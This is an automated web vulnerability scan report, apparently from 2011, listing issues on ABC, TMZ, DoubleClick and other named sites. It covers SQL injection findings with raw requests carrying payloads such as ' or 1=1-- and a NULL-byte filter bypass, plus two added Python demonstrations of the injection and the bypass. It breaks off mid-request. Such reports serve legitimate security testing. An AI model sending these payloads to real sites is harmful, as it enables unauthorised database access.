26.60. http://www.bostonheraldineducation.com/favicon.ico

26.61. http://www.courier-mta.org/imap/header.html

26.62. http://www.desktone.com/free_trial

26.63. http://www.disenter.com/disenter.css

26.64. http://www.disenter.com/favicon.ico

26.65. https://www.easynews.com/signup/lookit.phtml

26.66. http://www.elfqrin.com/hacklab/pages/nntpserv.php

26.67. http://www.ibm.com/ibm100/us/en/icons/v17-hp.html

26.68. http://www.itoncommand.com/demo/xxxx_main.html

26.69. http://www.radius-server.net/

26.70. http://www.radius-server.net/aradial-radius-server-billing-customers.html

26.71. http://www.radius-server.net/aradial-radius-server-billing-home-content.html

26.72. http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html

26.73. http://www.radius-server.net/aradial-radius-server-billing-partners.html

26.74. http://www.radius-server.net/aradial-radius-server-billing-pop-main.html

26.75. http://www.radius-server.net/blank-inner.html

26.76. http://www.radius-server.net/radius-billing.html

26.77. http://www.radius.cistron.nl/

26.78. http://www.radius.cistron.nl/faq/

26.79. http://www.spotngo.ca/

26.80. http://www.spotngo.ca/services.htm

26.81. http://www.vm.ibm.com/favicon.ico

26.82. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp

27. HTML uses unrecognised charset

27.1. http://js-kit.com/api/session/refresh.js

27.2. http://www.tmz.com/

27.3. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

27.4. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

27.5. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

27.6. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

27.7. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

27.8. http://www.tmz.com/reset-password/

27.9. http://www.tmz.com/signin/

27.10. http://www.toofab.com/

27.11. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

27.12. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

27.13. http://www.toofab.com/category/celeb-couples/

27.14. http://www.toofab.com/news/

28. Content type incorrectly stated

28.1. http://a1.interclick.com/getInPageJS.aspx

28.2. http://a1.interclick.com/getInPageJSProcess.aspx

28.3. http://ad.doubleclick.net/pfadx/tmz_cim/

28.4. https://admin.usenetbinaries.com/favicon.ico

28.5. http://adserver.teracent.net/tase/ad

28.6. http://advancedvoip.com/images/VoIP_white_papers.jpg

28.7. http://advancedvoip.com/images/VoIP_white_papers_up.jpg

28.8. http://advancedvoip.com/images/voip_billing_company.jpg

28.9. http://advancedvoip.com/images/voip_billing_company_contact.jpg

28.10. http://advancedvoip.com/images/voip_billing_company_contact_p.jpg

28.11. http://advancedvoip.com/images/voip_billing_company_p.jpg

28.12. http://advancedvoip.com/images/voip_billing_enterprise_solution.jpg

28.13. http://advancedvoip.com/images/voip_billing_enterprise_solution_p.jpg

28.14. http://advancedvoip.com/images/voip_billing_products.jpg

28.15. http://advancedvoip.com/images/voip_billing_products_p.jpg

28.16. http://advancedvoip.com/images/voip_billing_provider.jpg

28.17. http://advancedvoip.com/images/voip_billing_provider_p.jpg

28.18. http://ar.voicefive.com/b/rc.pli

28.19. http://attwireless-www.baynote.net/baynote/tags3/common

28.20. http://aud.pubmatic.com/AdServer/Artemis

28.21. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2

28.22. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0

28.23. http://blekko.com/autocomplete

28.24. http://bostonherald.com/edge/includes/twitter.inc

28.25. http://bostonherald.com/news/includes/twitter.inc

28.26. http://bostonherald.com/projects/payroll_ajax_api.bg

28.27. http://bostonherald.com/track/includes/twitter.inc

28.28. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx

28.29. http://bostonheraldnie.newspaperdirect.com/epaper/Services/ImgGalleryHandler.ashx

28.30. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.31. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848

28.32. http://cpanel.app9.hubspot.com/salog.js.aspx

28.33. http://duckduckgo.com/d.js

28.34. http://event.adxpose.com/event.flow

28.35. http://goku.brightcove.com/1pix.gif

28.36. http://helpdocs.westserver.net/v3/sitemanager/whstart.ico

28.37. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard

28.38. http://imp.fetchback.com/serve/fb/adtag.js

28.39. http://livechat.iadvize.com/rpc/referrer.php

28.40. http://members.westhost.com/favicon.ico

28.41. http://network.realmedia.com/favicon.ico

28.42. http://now.eloqua.com/visitor/v200/svrGP.aspx

28.43. http://oascentral.bostonherald.com/favicon.ico

28.44. http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090

28.45. http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27

28.46. http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7

28.47. http://ping.crowdscience.com/ping.js

28.48. http://ps2.newsinc.com/Playlist/show/90017/1564/1252.xml

28.49. http://ps2.newsinc.com/Playlist/show/90017/1957/507.xml

28.50. http://rt1302.infolinks.com/action/doq.htm

28.51. http://rt1302.infolinks.com/action/getads.htm

28.52. http://rt1701.infolinks.com/action/doq.htm

28.53. http://rt1702.infolinks.com/action/doq.htm

28.54. http://rt1803.infolinks.com/action/doq.htm

28.55. http://rt1901.infolinks.com/action/doq.htm

28.56. http://rt1903.infolinks.com/action/doq.htm

28.57. http://sales.liveperson.net/hcp/html/mTag.js

28.58. http://sensor2.suitesmart.com/sensor4.js

28.59. http://showadsak.pubmatic.com/AdServer/AdServerServlet

28.60. http://site.abc.go.com/_lib/getCountry

28.61. http://sr2.liveperson.net/hcp/html/mTag.js

28.62. http://stats.kaltura.com//api_v3/index.php

28.63. http://thumbnail.newsinc.com/23529280.sf.jpg

28.64. http://thumbnail.newsinc.com/23529394.sf.jpg

28.65. http://usenetjunction.com/scripts/track.php

28.66. http://www-03.ibm.com/innovation/us/watson/javascripts/pulse.js

28.67. http://www-146.ibm.com/nfluent/transwidget/tw.jsp

28.68. http://www.advancedvoip.com/images/VoIP_white_papers.jpg

28.69. http://www.advancedvoip.com/images/VoIP_white_papers_up.jpg

28.70. http://www.advancedvoip.com/images/voip_billing_company.jpg

28.71. http://www.advancedvoip.com/images/voip_billing_company_contact.jpg

28.72. http://www.advancedvoip.com/images/voip_billing_company_contact_p.jpg

28.73. http://www.advancedvoip.com/images/voip_billing_company_p.jpg

28.74. http://www.advancedvoip.com/images/voip_billing_enterprise_solution.jpg

28.75. http://www.advancedvoip.com/images/voip_billing_enterprise_solution_p.jpg

28.76. http://www.advancedvoip.com/images/voip_billing_products.jpg

28.77. http://www.advancedvoip.com/images/voip_billing_products_p.jpg

28.78. http://www.advancedvoip.com/images/voip_billing_provider.jpg

28.79. http://www.advancedvoip.com/images/voip_billing_provider_p.jpg

28.80. http://www.aradial.com/images/bg.gif

28.81. http://www.att.com/media/en_US/images/ico/ico_security_AA0009X7.jpg

28.82. http://www.att.com/navservice/navservlet

28.83. http://www.att.com/u-verse/dwr/interface/DWRRequestManager.js

28.84. http://www.bostonherald.com/news/includes/twitter.inc

28.85. http://www.cpanel.net/images/logo.jpg

28.86. https://www.easynews.com/signup/lookit.phtml

28.87. http://www.giganews.com/favicon.ico

28.88. https://www.giganews.com/favicon.ico

28.89. http://www.ibm.com/developerworks/dwtagg/css/h3/dogear.css

28.90. http://www.ibm.com/developerworks/dwtags/dwjquerytabtags

28.91. http://www.ibm.com/developerworks/java/inc/author-module.inc

28.92. http://www.ibm.com/developerworks/tagging/UseCaseServlet

28.93. http://www.ibm.com/developerworks/utils/ratingJSON.jsp

28.94. http://www.mailjet.com/ajax/home/emailLiveCounter

28.95. http://www.mokafive.com/highslide/graphics/zoomin.cur

28.96. http://www.mokafive.com/highslide/graphics/zoomout.cur

28.97. http://www.mokafive.com/images/mokafive_favicon.ico

28.98. http://www.open.com.au/favicon.ico

28.99. https://www.open.com.au/favicon.ico

28.100. http://www.radius-server.net/images/bg.gif

28.101. http://www.radius-server.net/images/logo.gif

28.102. http://www.radius-server.net/images/sm-adv.gif

28.103. http://www.radius-server.net/images/telelogo.gif

28.104. http://www.radius.cistron.nl/README.pam

28.105. http://www.thundernews.com/favicon.ico

28.106. https://www.thundernews.com/favicon.ico

28.107. http://www.usenetbinaries.com/favicon.ico

28.108. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp

28.109. http://www.westhost.com/favicon.ico

29. Content type is not specified

29.1. http://3ps.go.com/DynamicAd

29.2. http://ad.yieldmanager.com/st

29.3. http://ads.bluelithium.com/st

29.4. http://traffic.outbrain.com/network/redir

29.5. http://www.meebo.com/cmd/btproviders

29.6. http://www.meebo.com/cmd/tc

30. SSL certificate



1. SQL injection
There are 40 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://a.abc.com/service/sfp/omnitureconfig/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://a.abc.com
Path:   /service/sfp/omnitureconfig/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 97170536'%20or%201%3d1--%20 and 97170536'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
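The following Python is an added example written for this page (it is not code from the scanned application or from the scanner) that shows both the remediation described in the issue background, string concatenation beside a parameterised query, and the 1=1/1=2 differential test this finding relies on. It runs against an in-memory SQLite table whose rows, column names and lookup functions are constructed assumptions; the two probe strings are the URL-decoded payloads quoted above, appended to the path segment "service" the way the scanner appended them.

```python
import sqlite3

# Constructed sample data standing in for whatever table the endpoint really queries.
SAMPLE_ROWS = [
    ("sfp", "omniture config for the player"),
    ("service", "generic service endpoint"),
    ("admin", "internal only"),
]

# URL-decoded form of the two probes from the report, appended to the original segment value.
TRUE_PROBE = "service97170536' or 1=1-- "
FALSE_PROBE = "service97170536' or 1=2-- "


def make_db():
    """Build the in-memory table the examples query (constructed, not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE resources (name TEXT, description TEXT)")
    conn.executemany("INSERT INTO resources VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_concat(conn, name):
    """Vulnerable pattern: the user-controlled segment is spliced into the query text,
    so a quote ends the string literal and the rest becomes SQL."""
    sql = "SELECT name, description FROM resources WHERE name = '%s'" % name
    return conn.execute(sql).fetchall()


def lookup_param(conn, name):
    """Remediated pattern: query structure is fixed first, the value is bound second,
    so the quote and the trailing 'or 1=1--' are only ever compared as data."""
    sql = "SELECT name, description FROM resources WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def differential(lookup, conn):
    """The scanner's check: do the 1=1 and 1=2 probes yield different results?
    True for the concatenating lookup, False for the parameterised one."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)


if __name__ == "__main__":
    conn = make_db()
    print("concat  differs:", differential(lookup_concat, conn))   # True: 3 rows vs 0 rows
    print("param   differs:", differential(lookup_param, conn))    # False: 0 rows both times
    print("param   legit  :", lookup_param(conn, "sfp"))
```

Two things the run makes visible that the scanner output alone does not: the vulnerable lookup returns every row for the 1=1 probe (the `--` comments out the closing quote), and the parameterised version returns nothing for either probe while still serving the legitimate value, which is the result to look for when manually confirming a differential finding.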

Request 1

GET /service97170536'%20or%201%3d1--%20/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angels HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Content-Length: 163
Location: http://abc.go.com/error
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed01
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 17 Sep 2011 01:03:35 GMT
Connection: close

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://abc.go.com/error
">http://abc.go.com/error
</A>.<BODY></HTML>

Request 2

GET /service97170536'%20or%201%3d2--%20/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angels HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 17 Sep 2011 01:03:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed08
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 01:08:35 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Content-Length: 0
Cache-Control: max-age=300
Date: Sat, 17 Sep 2011 01:03:38 GMT
Connection: close


1.2. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10 [id cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N884.abc.com/B5709785.10

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00'

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7358
Set-Cookie: id=c81da3c3c0000be||t=1316221599|et=730|cs=002213fd4807e2941091f2164a; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:06:39 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:06:39 GMT
Date: Sat, 17 Sep 2011 01:06:39 GMT
Expires: Sat, 17 Sep 2011 01:06:39 GMT
Cache-Control: private, max-age=300

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Jan 27 16:06:44 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...
ash"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00''

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1667
Set-Cookie: id=c91da3c3c000047||t=1316221600|et=730|cs=002213fd48f445365653400eb4; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:06:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:06:40 GMT
Date: Sat, 17 Sep 2011 01:06:40 GMT
Expires: Sat, 17 Sep 2011 01:06:40 GMT
Cache-Control: private, max-age=300

<script type="text/javascript">
var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/f/8b/%2a/i%3B243805900%3B1-0%3B0%3B67516235%3B3454-728/90%3B42127629/42145416/1%3B
...[SNIP]...

1.3. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/tmz.toofab.wb.dart/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
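The NULL-byte bypass described in the remediation detail for this finding and for 1.2 above can be reproduced without a WAF. The Python below is an added example for this page (not the vendor's or the scanner's code): it URL-decodes the probe the scanner sent, models a native-code filter by reading the value through a C string pointer (ctypes.c_char_p stops at the first NUL exactly as strlen/strstr-based code does), and then checks whether the quote the filter never saw still reaches a length-aware consumer. The filter rule and the function names are constructed assumptions.

```python
import ctypes
from urllib.parse import unquote_to_bytes

# Constructed inputs: the scanner's probe from the request above, and the same probe without the NUL.
PROBE_WITH_NUL = "OPT_OUT%00'"
PROBE_PLAIN = "OPT_OUT'"


def decode_cookie_value(raw: str) -> bytes:
    """URL-decode to the bytes the server actually receives; %00 becomes a real NUL byte."""
    return unquote_to_bytes(raw)


def native_view(value: bytes) -> bytes:
    """What C-string code sees: ctypes.c_char_p.value reads up to the first NUL and drops the rest."""
    return ctypes.c_char_p(value).value


def waf_blocks(value: bytes) -> bool:
    """Hypothetical native-code WAF rule: reject when a single quote is present in the C string."""
    return b"'" in native_view(value)


def length_aware_blocks(value: bytes) -> bool:
    """The same rule applied to the full length-delimited buffer: the NUL hides nothing."""
    return b"'" in value


def slips_past_waf(raw: str) -> bool:
    """True when the decoded value passes the native filter yet still carries a quote
    for a managed runtime (or the database driver) to consume."""
    value = decode_cookie_value(raw)
    return not waf_blocks(value) and b"'" in value


if __name__ == "__main__":
    for raw in (PROBE_PLAIN, PROBE_WITH_NUL):
        value = decode_cookie_value(raw)
        print(f"{raw!r:16} native sees {native_view(value)!r:12} "
              f"waf_blocks={waf_blocks(value)} length_aware_blocks={length_aware_blocks(value)} "
              f"bypass={slips_past_waf(raw)}")
```

The plain quote is blocked; prefixing it with %00 makes the native filter see only "OPT_OUT" while the full value, quote included, continues to the application. This is why the remediation detail tells you to fix the query itself rather than rely on the filter: length-aware matching closes the NUL trick, but only parameterisation removes the injection.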

Request 1

GET /adj/tmz.toofab.wb.dart/;pos=atf;boxad=1;syncad=yes;tile=1;dcopt=ist;sz=728x90,970x66;qcseg=D;ord=9367342558689416&1%00'=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6149
Set-Cookie: id=cfbdc3c3c000003||t=1316221750|et=730|cs=002213fd486089af9086817dd8; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:09:10 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:09:10 GMT
Date: Sat, 17 Sep 2011 01:09:10 GMT
Expires: Sat, 17 Sep 2011 01:09:10 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Sep 08 17:56:44 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/tmz.toofab.wb.dart/;pos=atf;boxad=1;syncad=yes;tile=1;dcopt=ist;sz=728x90,970x66;qcseg=D;ord=9367342558689416&1%00''=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 767
Set-Cookie: id=ce3dc3c3c000038||t=1316221751|et=730|cs=002213fd48f22ac6f4531511ae; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:09:11 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:09:11 GMT
Date: Sat, 17 Sep 2011 01:09:11 GMT
Expires: Sat, 17 Sep 2011 01:09:11 GMT
Cache-Control: private

document.write('<script src=\"http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2105173&PluID=0&w=728&h=90&ord=1802222&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/j%3B
...[SNIP]...

1.4. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adsatt.abc.starwave.com
Path:   /ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ad'%20and%201%3d1--%20/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
